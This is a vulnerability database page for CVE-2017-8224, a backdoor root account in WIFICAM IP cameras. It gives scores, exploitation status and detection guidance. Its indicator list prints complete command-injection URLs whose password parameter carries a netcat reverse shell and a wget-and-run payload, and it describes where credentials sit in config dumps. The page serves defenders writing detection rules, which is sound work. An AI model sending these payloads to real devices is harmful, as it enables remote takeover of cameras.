cbcvebase.
CVE-2017-8224
published 2017-04-25

CVE-2017-8224: Wireless IP Camera (P2P) WIFICAM devices have a backdoor root account that can be accessed with TELNET.

PriorityP180critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
8.58%
94.4th percentile
Wireless IP Camera (P2P) WIFICAM devices have a backdoor root account that can be accessed with TELNET.

Detection & IOCsextracted from sources · hover to see the quote

url/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20192.168.1.1+1337%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0
url/ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s
url/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+192.168.1.1+1337+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0
url/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://192.168.1.1/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0
commandnc 192.168.1.1 1337 -e /bin/sh
bytes
0x0a 0x0a 0x0a 0x0a 0x01
  • Monitor HTTP GET requests to /set_ftp.cgi and /ftptest.cgi containing shell metacharacters (e.g., $(), nc, wget) in the `pwd` parameter — this is the command injection vector for RCE.
  • Detect inbound Telnet connections to the device — the backdoor root account is accessible via Telnet.
  • In captured binary config dumps from the device, credentials are located at offset +138 (username) and +170 (password) bytes after the 4-byte 0x0a sequence followed by 0x01; the default username is 'admin'.
  • ·The exploit targets port 80 (CAM_PORT) by default; the camera's web interface may be hosted on a non-standard port in some deployments, requiring port-agnostic detection on the CGI paths.
  • ·The connect-back shell uses a hardcoded attacker IP (REMOTE_HOST 192.168.1.1) and port (REMOTE_PORT 1337) in the PoC; real-world attacks will substitute arbitrary attacker-controlled values in the `pwd` parameter.
  • ·Two alternative payload forms exist for the injection: URL-encoded spaces (%20) and plus-sign-encoded spaces (+) — detection signatures must account for both encoding variants.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.